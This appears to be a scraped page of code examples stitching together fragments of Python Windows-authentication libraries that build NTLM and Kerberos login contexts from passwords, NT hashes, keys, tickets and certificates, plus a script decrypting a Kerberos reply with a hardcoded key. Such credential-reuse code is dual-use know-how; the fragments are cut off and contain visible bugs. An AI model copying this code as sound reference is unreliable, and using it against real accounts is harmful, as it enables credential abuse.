                LDAPAuthProtocol.KERBEROS_CCACHE,
                LDAPAuthProtocol.KERBEROS_KEYTAB,
                LDAPAuthProtocol.KERBEROS_KIRBI, LDAPAuthProtocol.KERBEROS_PFX,
                LDAPAuthProtocol.KERBEROS_PEM,
                LDAPAuthProtocol.KERBEROS_CERTSTORE
        ]:

            if self.target is None:
                raise Exception('Target must be specified with Kerberos!')

            if self.target.host is None:
                raise Exception(
                    'target must have a domain name or hostname for kerberos!')

            if self.target.dc_ip is None:
                raise Exception('target must have a dc_ip for kerberos!')

            kcred = MSLDAPKerberosCredential()
            if self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KIRBI:
                kc = KerberosCredential.from_kirbi(self.creds.password,
                                                   self.creds.username,
                                                   self.creds.domain)
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_CCACHE:
                kc = KerberosCredential.from_ccache_file(
                    self.creds.password, self.creds.username,
                    self.creds.domain)
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KEYTAB:
                kc = KerberosCredential.from_kirbi(self.creds.password,
                                                   self.creds.username,
                                                   self.creds.domain)
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_PFX:
                kc = KerberosCredential.from_pfx_file(
                    self.creds.username,
                    self.creds.password,
                    username=self.creds.altname,
                    domain=self.creds.altdomain)
                self.creds.username = kc.username
                self.creds.domain = kc.domain
                self.target.domain = kc.domain
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_PEM:
                kc = KerberosCredential.from_pem_file(
                    self.creds.username,
                    self.creds.password,
                    username=self.creds.altname,
                    domain=self.creds.altdomain)
                self.creds.username = kc.username
                self.creds.domain = kc.domain
                self.target.domain = kc.domain
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_CERTSTORE:
                # username is the CN of the certificate
                # secret is the name of the certstore, default: MY
                certstore = self.creds.secret
                if self.creds.secret is None:
                    certstore = 'MY'
                kc = KerberosCredential.from_windows_certstore(
                    self.creds.username,
                    certstore,
                    username=self.creds.altname,
                    domain=self.creds.altdomain)
                self.creds.username = kc.username
                self.creds.domain = kc.domain
                self.target.domain = kc.domain

            else:
                kc = KerberosCredential()
                kc.username = self.creds.username
                kc.domain = self.creds.domain
            kcred.enctypes = []
            if self.creds.auth_method == LDAPAuthProtocol.KERBEROS_PASSWORD:
                kc.password = self.creds.password
                kcred.enctypes = [23, 17, 18]
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_NT:
                kc.nt_hash = self.creds.password
                kcred.enctypes = [23]

            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_AES:
                if len(self.creds.password) == 32:
                    kc.kerberos_key_aes_128 = self.creds.password
                    kcred.enctypes = [17]
                elif len(self.creds.password) == 64:
                    kc.kerberos_key_aes_256 = self.creds.password
                    kcred.enctypes = [18]

            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_RC4:
                kc.kerberos_key_rc4 = self.creds.password
                kcred.enctypes = [23]

            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_CCACHE:
                kcred.enctypes = [23, 17, 18]  # TODO: fix this
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KEYTAB:
                kc.keytab = self.creds.password
                kcred.enctypes = [23, 17, 18]  # TODO: fix this
            elif self.creds.auth_method == LDAPAuthProtocol.KERBEROS_KIRBI:
                kcred.enctypes = [23, 17, 18]  # TODO: fix this
            elif self.creds.auth_method in [
                    LDAPAuthProtocol.KERBEROS_PFX,
                    LDAPAuthProtocol.KERBEROS_CERTSTORE,
                    LDAPAuthProtocol.KERBEROS_PEM
            ]:
                kcred.enctypes = [17, 18]
            else:
                raise Exception(
                    'No suitable secret type found to set up kerberos!')

            if self.creds.etypes is not None:
                kcred.enctypes = list(
                    set(self.creds.etypes).intersection(set(kcred.enctypes)))

            kcred.ccred = kc
            kcred.spn = KerberosSPN.from_target_string(
                self.target.to_target_string())
            kcred.target = KerberosTarget(self.target.dc_ip)
            kcred.encrypt = self.creds.encrypt

            if self.target.proxy is not None:
                kcred.target.proxy = KerberosProxy()
                kcred.target.proxy.type = self.target.proxy.type
                kcred.target.proxy.target = copy.deepcopy(
                    self.target.proxy.target)
                kcred.target.proxy.target[-1].endpoint_ip = self.target.dc_ip
                kcred.target.proxy.target[-1].endpoint_port = 88

            handler = MSLDAPKerberos(kcred)

            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
            return spneg

        elif self.creds.auth_method == LDAPAuthProtocol.SSPI_KERBEROS:
            if self.target is None:
                raise Exception('Target must be specified with Kerberos SSPI!')

            kerbcred = MSLDAPKerberosSSPICredential()
            kerbcred.username = self.creds.domain if self.creds.domain is not None else '<CURRENT>'
            kerbcred.username = self.creds.username if self.creds.username is not None else '<CURRENT>'
            kerbcred.password = self.creds.password if self.creds.password is not None else '<CURRENT>'
            kerbcred.spn = self.target.to_target_string()
            kerbcred.encrypt = self.creds.encrypt

            handler = MSLDAPKerberosSSPI(kerbcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
            return spneg

        elif self.creds.auth_method == LDAPAuthProtocol.SSPI_NTLM:
            ntlmcred = MSLDAPNTLMSSPICredential()
            ntlmcred.username = self.creds.domain if self.creds.domain is not None else '<CURRENT>'
            ntlmcred.username = self.creds.username if self.creds.username is not None else '<CURRENT>'
            ntlmcred.password = self.creds.password if self.creds.password is not None else '<CURRENT>'
            ntlmcred.encrypt = self.creds.encrypt

            handler = MSLDAPNTLMSSPI(ntlmcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
            return spneg

        elif self.creds.auth_method.value.startswith('MULTIPLEXOR'):
            if self.creds.auth_method in [
                    LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM,
                    LDAPAuthProtocol.MULTIPLEXOR_NTLM
            ]:
                from msldap.authentication.ntlm.multiplexor import MSLDAPNTLMMultiplexor
                ntlmcred = MSLDAPMultiplexorCredential()
                ntlmcred.type = 'NTLM'
                if self.creds.username is not None:
                    ntlmcred.username = '******'
                if self.creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if self.creds.password is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if self.creds.auth_method == LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
                ntlmcred.parse_settings(self.creds.settings)
                ntlmcred.encrypt = self.creds.encrypt

                handler = MSLDAPNTLMMultiplexor(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif self.creds.auth_method in [
                    LDAPAuthProtocol.MULTIPLEXOR_SSL_KERBEROS,
                    LDAPAuthProtocol.MULTIPLEXOR_KERBEROS
            ]:
                from msldap.authentication.kerberos.multiplexor import MSLDAPKerberosMultiplexor

                ntlmcred = MSLDAPMultiplexorCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = self.target
                if self.creds.username is not None:
                    ntlmcred.username = '******'
                if self.creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if self.creds.password is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if self.creds.auth_method == LDAPAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
                ntlmcred.parse_settings(self.creds.settings)
                ntlmcred.encrypt = self.creds.encrypt

                handler = MSLDAPKerberosMultiplexor(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg

        elif self.creds.auth_method.value.startswith('SSPIPROXY'):
            if self.creds.auth_method == LDAPAuthProtocol.SSPIPROXY_NTLM:
                from msldap.authentication.ntlm.sspiproxy import MSLDAPSSPIProxyNTLMAuth
                ntlmcred = MSLDAPSSPIProxyCredential()
                ntlmcred.type = 'NTLM'
                if self.creds.username is not None:
                    ntlmcred.username = '******'
                if self.creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if self.creds.password is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.encrypt = self.creds.encrypt
                ntlmcred.host = self.creds.settings['host'][0]
                ntlmcred.port = int(self.creds.settings['port'][0])
                ntlmcred.proto = 'ws'
                if 'proto' in self.creds.settings:
                    ntlmcred.proto = self.creds.settings['proto'][0]
                if 'agentid' in self.creds.settings:
                    ntlmcred.agent_id = bytes.fromhex(
                        self.creds.settings['agentid'][0])

                handler = MSLDAPSSPIProxyNTLMAuth(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif self.creds.auth_method == LDAPAuthProtocol.SSPIPROXY_KERBEROS:
                from msldap.authentication.kerberos.sspiproxyws import MSLDAPSSPIProxyKerberosAuth

                ntlmcred = MSLDAPSSPIProxyCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = self.target
                if self.creds.username is not None:
                    ntlmcred.username = '******'
                if self.creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if self.creds.password is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.encrypt = self.creds.encrypt
                ntlmcred.host = self.creds.settings['host'][0]
                ntlmcred.port = self.creds.settings['port'][0]
                ntlmcred.proto = 'ws'
                if 'proto' in self.creds.settings:
                    ntlmcred.proto = self.creds.settings['proto'][0]
                if 'agentid' in self.creds.settings:
                    ntlmcred.agent_id = bytes.fromhex(
                        self.creds.settings['agentid'][0])

                handler = MSLDAPSSPIProxyKerberosAuth(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg

        elif self.creds.auth_method.value.startswith('WSNET'):
            if self.creds.auth_method in [LDAPAuthProtocol.WSNET_NTLM]:
                from msldap.authentication.ntlm.wsnet import MSLDAPWSNetNTLMAuth

                ntlmcred = MSLDAPWSNETCredential()
                ntlmcred.type = 'NTLM'
                if self.creds.username is not None:
                    ntlmcred.username = '******'
                if self.creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if self.creds.password is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False

                handler = MSLDAPWSNetNTLMAuth(ntlmcred)
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif self.creds.auth_method in [LDAPAuthProtocol.WSNET_KERBEROS]:
                from msldap.authentication.kerberos.wsnet import MSLDAPWSNetKerberosAuth

                ntlmcred = MSLDAPWSNETCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = self.target
                if self.creds.username is not None:
                    ntlmcred.username = '******'
                if self.creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if self.creds.password is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False

                handler = MSLDAPWSNetKerberosAuth(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg
Exemplo n.º 13
0
    def to_spnego_cred(creds, target=None):
        if creds.authentication_type == SMBAuthProtocol.NTLM:
            ntlmcred = SMBNTLMCredential()
            ntlmcred.username = creds.username
            ntlmcred.domain = creds.domain if creds.domain is not None else ''
            ntlmcred.workstation = None
            ntlmcred.is_guest = False

            if creds.secret is None:
                raise Exception('NTLM authentication requres password!')
            if creds.secret_type == SMBCredentialsSecretType.NT:
                ntlmcred.nt_hash = creds.secret
            elif creds.secret_type == SMBCredentialsSecretType.PASSWORD:
                ntlmcred.password = creds.secret

            settings = NTLMHandlerSettings(ntlmcred)
            handler = NTLMAUTHHandler(settings)

            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NTLMSSP - Microsoft NTLM Security Support Provider', handler)

            return spneg

        elif creds.authentication_type == SMBAuthProtocol.KERBEROS:
            if target is None:
                raise Exception('Target must be specified with Kerberos!')

            if target.hostname is None:
                raise Exception(
                    'target must have a domain name or hostname for kerberos!')

            if target.dc_ip is None:
                raise Exception('target must have a dc_ip for kerberos!')

            kc = KerberosCredential()
            kc.username = creds.username
            kc.domain = creds.domain
            if creds.secret_type == SMBCredentialsSecretType.PASSWORD:
                kc.password = creds.secret
            elif creds.secret_type == SMBCredentialsSecretType.NT:
                kc.nt_hash = creds.secret

            elif creds.secret_type == SMBCredentialsSecretType.AES:
                if len(creds.secret) == 32:
                    kc.kerberos_key_aes_128 = creds.secret
                elif len(creds.secret) == 64:
                    kc.kerberos_key_aes_256 = creds.secret

            elif creds.secret_type == SMBCredentialsSecretType.RC4:
                kc.kerberos_key_rc4 = creds.secret

            elif creds.secret_type == SMBCredentialsSecretType.RC4:
                kc.ccache = creds.secret
            else:
                raise Exception(
                    'No suitable secret type found to set up kerberos!')

            kcred = SMBKerberosCredential()
            kcred.ccred = kc
            kcred.spn = KerberosSPN.from_target_string(
                target.to_target_string())
            kcred.target = KerberosTarget(target.dc_ip)
            if target.proxy is not None:
                kcred.target.proxy = KerberosProxy()
                kcred.target.proxy.target = copy.deepcopy(target.proxy.target)
                kcred.target.proxy.target.endpoint_ip = target.dc_ip
                kcred.target.proxy.target.endpoint_port = 88
                kcred.target.proxy.creds = copy.deepcopy(target.proxy.auth)

            handler = SMBKerberos(kcred)

            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
            return spneg

        elif creds.authentication_type == SMBAuthProtocol.SSPI_KERBEROS:
            if target is None:
                raise Exception('Target must be specified with Kerberos SSPI!')

            kerbcred = SMBKerberosSSPICredential()
            kerbcred.client = None  #creds.username #here we could submit the domain as well for impersonation? TODO!
            kerbcred.password = creds.secret
            kerbcred.target = target.to_target_string()

            handler = SMBKerberosSSPI(kerbcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
            return spneg

        elif creds.authentication_type == SMBAuthProtocol.SSPI_NTLM:
            ntlmcred = SMBNTLMSSPICredential()
            ntlmcred.client = creds.username  #here we could submit the domain as well for impersonation? TODO!
            ntlmcred.password = creds.secret

            handler = SMBNTLMSSPI(ntlmcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
            return spneg

        elif creds.authentication_type.value.startswith('MULTIPLEXOR'):
            if creds.authentication_type in [
                    SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM,
                    SMBAuthProtocol.MULTIPLEXOR_NTLM
            ]:
                from aiosmb.authentication.ntlm.multiplexor import SMBNTLMMultiplexor

                ntlmcred = SMBMultiplexorCredential()
                ntlmcred.type = 'NTLM'
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
                ntlmcred.parse_settings(creds.settings)

                handler = SMBNTLMMultiplexor(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif creds.authentication_type in [
                    SMBAuthProtocol.MULTIPLEXOR_SSL_KERBEROS,
                    SMBAuthProtocol.MULTIPLEXOR_KERBEROS
            ]:
                from aiosmb.authentication.kerberos.multiplexor import SMBKerberosMultiplexor

                ntlmcred = SMBMultiplexorCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = creds.target
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
                ntlmcred.parse_settings(creds.settings)

                handler = SMBKerberosMultiplexor(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg
Exemplo n.º 14
0
print('============= ERROR E-DATA =======================')
# if error is KDC_ERR_PREAUTH_REQUIRED then e-data might contain info. this info is 
kerr_1_edata_native = METHOD_DATA.load(kerr_1_native['e-data']).native
pprint(kerr_1_edata_native)


asreq_2_native = KDC_REQ.load(asreq_2).native 
pprint(asreq_2_native)

#print('aaa')
#pprint(asreq_2_native['padata'][0]['padata-value'])

asrep_4_native = KerberosResponse.load(asrep_4).native
pprint(asrep_4_native)

cred = KerberosCredential()
cred.username = '******'
cred.domain = 'TEST.corp'
#cred.password = '******'
cred.kerberos_key_aes_256 = '7289306c73ca8909cf89bc01afe3e29f26211f89d922fb317cc5d81cfdf8465d'

supp_enc = EncryptionType.AES256_CTS_HMAC_SHA1_96

cipherText = asrep_4_native['enc-part']['cipher']
print(cipherText.hex())
key_bytes = cred.get_key_for_enctype(supp_enc, None)
kerberos_key = Key(_enctype_table[asrep_4_native['enc-part']['etype']].enctype, key_bytes)
temp = _enctype_table[asrep_4_native['enc-part']['etype']].decrypt(kerberos_key, 3, cipherText)

temp_dec = EncASRepPart.load(temp).native
pprint(temp_dec)
Exemplo n.º 15
0
    def get_kerberos_cred(self):
        stype = None
        dbstype = self.stype.upper()
        if dbstype in ['PW', 'PASSWORD', 'PASS']:
            kc = KerberosCredential()
            kc.domain = self.domain
            kc.username = self.username
            kc.add_secret(KerberosSecretType.PASSWORD, self.secret)
            return kc
        elif dbstype in ['RC4', 'NT']:
            kc = KerberosCredential()
            kc.domain = self.domain
            kc.username = self.username
            kc.add_secret(KerberosSecretType.RC4, self.secret)
            return kc
        elif dbstype in ['AES', 'AES128', 'AES256']:
            kc = KerberosCredential()
            kc.domain = self.domain
            kc.username = self.username
            kc.add_secret(KerberosSecretType.AES, self.secret)
            return kc
        elif dbstype in ['KEYTAB']:
            kc = KerberosCredential.from_keytab(self.secret)
            kc.domain = self.domain
            kc.username = self.username
            return kc
        elif dbstype in ['KIRBI']:
            kc = KerberosCredential.from_kirbi(self.secret)
            return kc

        if stype is None:
            raise Exception('Couldnt figure out correct stype for customcred!')
Exemplo n.º 16
0
    def to_spnego_cred(creds, target=None):
        if creds.authentication_type == SMBAuthProtocol.NEGOEX:
            with_certstrore = creds.secret_type == SMBCredentialsSecretType.CERTSTORE
            settings = SPNEGOEXAuthHandlerSettings(
                creds.username,
                creds.secret,
                target,
                dh_params=None,
                with_certstrore=with_certstrore)
            handler = SPNEGOEXAuthHandler(settings)

            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NEGOEX - SPNEGO Extended Negotiation Security Mechanism',
                handler)

            return spneg

        elif creds.authentication_type == SMBAuthProtocol.NTLM:
            ntlmcred = SMBNTLMCredential()
            ntlmcred.username = creds.username
            ntlmcred.domain = creds.domain if creds.domain is not None else ''
            ntlmcred.workstation = None
            ntlmcred.is_guest = False

            if creds.secret is None:
                if creds.username is None and creds.domain is None:
                    ntlmcred.is_guest = True
                else:
                    raise Exception('NTLM authentication requres password!')

            if creds.secret_type == SMBCredentialsSecretType.NT:
                ntlmcred.nt_hash = creds.secret
            elif creds.secret_type == SMBCredentialsSecretType.PASSWORD:
                ntlmcred.password = creds.secret

            settings = NTLMHandlerSettings(ntlmcred)
            handler = NTLMAUTHHandler(settings)

            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NTLMSSP - Microsoft NTLM Security Support Provider', handler)

            return spneg

        elif creds.authentication_type == SMBAuthProtocol.KERBEROS:
            if target is None:
                raise Exception('Target must be specified with Kerberos!')

            if target.hostname is None:
                raise Exception(
                    'target must have a domain name or hostname for kerberos!')

            if target.dc_ip is None:
                raise Exception('target must have a dc_ip for kerberos!')

            if creds.secret_type == SMBCredentialsSecretType.KEYTAB:
                filename = creds.secret
                if creds.secret.upper() == 'ENV':
                    filename = os.environ['KRB5KEYTAB']

                kc = KerberosCredential.from_keytab(filename, creds.username,
                                                    creds.domain)

            elif creds.secret_type == SMBCredentialsSecretType.CCACHE:
                filename = creds.secret
                if creds.secret.upper() == 'ENV':
                    try:
                        filename = os.environ['KRB5CCACHE']
                    except:
                        raise Exception(
                            'Kerberos auth missing environment variable KRB5CCACHE'
                        )
                kc = KerberosCredential.from_ccache_file(filename)
                kc.username = creds.username
                kc.domain = creds.domain

            elif creds.secret_type == SMBCredentialsSecretType.KIRBI:
                filename = creds.secret
                kc = KerberosCredential.from_kirbi(filename)
                kc.username = creds.username
                kc.domain = creds.domain

            elif creds.secret_type == SMBCredentialsSecretType.PFX:
                kc = KerberosCredential.from_pfx_file(creds.username,
                                                      creds.secret,
                                                      username=creds.altname,
                                                      domain=creds.altdomain)
                creds.username = kc.username
                creds.domain = kc.domain
                target.domain = kc.domain

            elif creds.secret_type == SMBCredentialsSecretType.PFXSTR:
                kc = KerberosCredential.from_pfx_string(creds.username,
                                                        creds.secret,
                                                        username=creds.altname,
                                                        domain=creds.altdomain)
                creds.username = kc.username
                creds.domain = kc.domain
                target.domain = kc.domain

            elif creds.secret_type == SMBCredentialsSecretType.PEM:
                kc = KerberosCredential.from_pem_file(creds.username,
                                                      creds.secret,
                                                      username=creds.altname,
                                                      domain=creds.altdomain)
                creds.username = kc.username
                creds.domain = kc.domain
                target.domain = kc.domain

            elif creds.secret_type == SMBCredentialsSecretType.CERTSTORE:
                # username is the CN of the certificate
                # secret is the name of the certstore, default: MY
                certstore = creds.secret
                if creds.secret is None:
                    certstore = 'MY'
                kc = KerberosCredential.from_windows_certstore(
                    creds.username,
                    certstore,
                    username=creds.altname,
                    domain=creds.altdomain)
                creds.username = kc.username
                creds.domain = kc.domain
                target.domain = kc.domain

            else:
                kc = KerberosCredential()
                kc.username = creds.username
                kc.domain = creds.domain
                if creds.secret_type == SMBCredentialsSecretType.PASSWORD:
                    kc.password = creds.secret
                elif creds.secret_type == SMBCredentialsSecretType.NT:
                    kc.nt_hash = creds.secret

                elif creds.secret_type == SMBCredentialsSecretType.AES:
                    if len(creds.secret) == 32:
                        kc.kerberos_key_aes_128 = creds.secret
                    elif len(creds.secret) == 64:
                        kc.kerberos_key_aes_256 = creds.secret

                elif creds.secret_type == SMBCredentialsSecretType.RC4:
                    kc.kerberos_key_rc4 = creds.secret

            if kc is None:
                raise Exception(
                    'No suitable secret type found to set up kerberos!')

            kcred = SMBKerberosCredential()
            kcred.ccred = kc
            kcred.spn = KerberosSPN.from_target_string(
                target.to_target_string())

            if target.proxy is not None:
                if target.proxy.type in [
                        SMBProxyType.WSNET, SMBProxyType.SOCKS5,
                        SMBProxyType.SOCKS5_SSL, SMBProxyType.SOCKS4,
                        SMBProxyType.SOCKS4_SSL
                ]:
                    kcred.target = KerberosTarget(target.dc_ip)
                    kcred.target.proxy = KerberosProxy()
                    kcred.target.proxy.target = copy.deepcopy(
                        target.proxy.target)
                    kcred.target.proxy.target[-1].endpoint_ip = target.dc_ip
                    kcred.target.proxy.target[-1].endpoint_port = 88

                elif target.proxy.type in [
                        SMBProxyType.MULTIPLEXOR, SMBProxyType.MULTIPLEXOR_SSL
                ]:
                    kcred.target = KerberosTarget(target.dc_ip)
                    kcred.target.proxy = copy.deepcopy(target.proxy)

            else:
                kcred.target = KerberosTarget(target.dc_ip)
            handler = SMBKerberos(kcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
            return spneg

        elif creds.authentication_type == SMBAuthProtocol.SSPI_KERBEROS:
            if target is None:
                raise Exception('Target must be specified with Kerberos SSPI!')

            kerbcred = SMBKerberosSSPICredential()
            kerbcred.client = None  #creds.username #here we could submit the domain as well for impersonation? TODO!
            kerbcred.password = creds.secret
            kerbcred.target = target.to_target_string()

            handler = SMBKerberosSSPI(kerbcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5', handler)
            return spneg

        elif creds.authentication_type == SMBAuthProtocol.SSPI_NTLM:
            ntlmcred = SMBNTLMSSPICredential()
            ntlmcred.client = creds.username  #here we could submit the domain as well for impersonation? TODO!
            ntlmcred.password = creds.secret

            handler = SMBNTLMSSPI(ntlmcred)
            #setting up SPNEGO
            spneg = SPNEGO()
            spneg.add_auth_context(
                'NTLMSSP - Microsoft NTLM Security Support Provider', handler)
            return spneg

        elif creds.authentication_type.value.startswith('MPN'):
            if creds.authentication_type in [
                    SMBAuthProtocol.MPN_SSL_NTLM, SMBAuthProtocol.MPN_NTLM
            ]:
                from aiosmb.authentication.ntlm.mpn import SMBNTLMMPN
                ntlmcred = SMBMPNCredential()
                ntlmcred.type = 'NTLM'
                ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MPN_SSL_NTLM else False
                ntlmcred.parse_settings(creds.settings)

                handler = SMBNTLMMPN(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif creds.authentication_type in [
                    SMBAuthProtocol.MPN_SSL_KERBEROS,
                    SMBAuthProtocol.MPN_KERBEROS
            ]:
                from aiosmb.authentication.kerberos.mpn import SMBKerberosMPN

                ntlmcred = SMBMPNCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = creds.target
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MPN_SSL_KERBEROS else False
                ntlmcred.parse_settings(creds.settings)

                handler = SMBKerberosMPN(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg

        elif creds.authentication_type.value.startswith('MULTIPLEXOR'):
            if creds.authentication_type in [
                    SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM,
                    SMBAuthProtocol.MULTIPLEXOR_NTLM
            ]:
                from aiosmb.authentication.ntlm.multiplexor import SMBNTLMMultiplexor

                ntlmcred = SMBMultiplexorCredential()
                ntlmcred.type = 'NTLM'
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
                ntlmcred.parse_settings(creds.settings)

                handler = SMBNTLMMultiplexor(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif creds.authentication_type in [
                    SMBAuthProtocol.MULTIPLEXOR_SSL_KERBEROS,
                    SMBAuthProtocol.MULTIPLEXOR_KERBEROS
            ]:
                from aiosmb.authentication.kerberos.multiplexor import SMBKerberosMultiplexor

                ntlmcred = SMBMultiplexorCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = creds.target
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False
                ntlmcred.is_ssl = True if creds.authentication_type == SMBAuthProtocol.MULTIPLEXOR_SSL_NTLM else False
                ntlmcred.parse_settings(creds.settings)

                handler = SMBKerberosMultiplexor(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg

        elif creds.authentication_type.value.startswith('WSNET'):
            if creds.authentication_type in [SMBAuthProtocol.WSNET_NTLM]:
                from aiosmb.authentication.ntlm.wsnet import SMBWSNetNTLMAuth

                ntlmcred = SMBWSNETCredential()
                ntlmcred.type = 'NTLM'
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False

                handler = SMBWSNetNTLMAuth(ntlmcred)
                spneg = SPNEGO()
                spneg.add_auth_context(
                    'NTLMSSP - Microsoft NTLM Security Support Provider',
                    handler)
                return spneg

            elif creds.authentication_type in [SMBAuthProtocol.WSNET_KERBEROS]:
                from aiosmb.authentication.kerberos.wsnet import SMBWSNetKerberosAuth

                ntlmcred = SMBWSNETCredential()
                ntlmcred.type = 'KERBEROS'
                ntlmcred.target = creds.target
                if creds.username is not None:
                    ntlmcred.username = '******'
                if creds.domain is not None:
                    ntlmcred.domain = '<CURRENT>'
                if creds.secret is not None:
                    ntlmcred.password = '******'
                ntlmcred.is_guest = False

                handler = SMBWSNetKerberosAuth(ntlmcred)
                #setting up SPNEGO
                spneg = SPNEGO()
                spneg.add_auth_context('MS KRB5 - Microsoft Kerberos 5',
                                       handler)
                return spneg

        elif creds.authentication_type.value.startswith('SSPIPROXY'):
            if creds.authentication_type == SMBAuthProtocol.SSPIPROXY_NTLM:
                from aiosmb.authentication.ntlm.sspiproxy import SMBSSPIProxyNTLMAuth

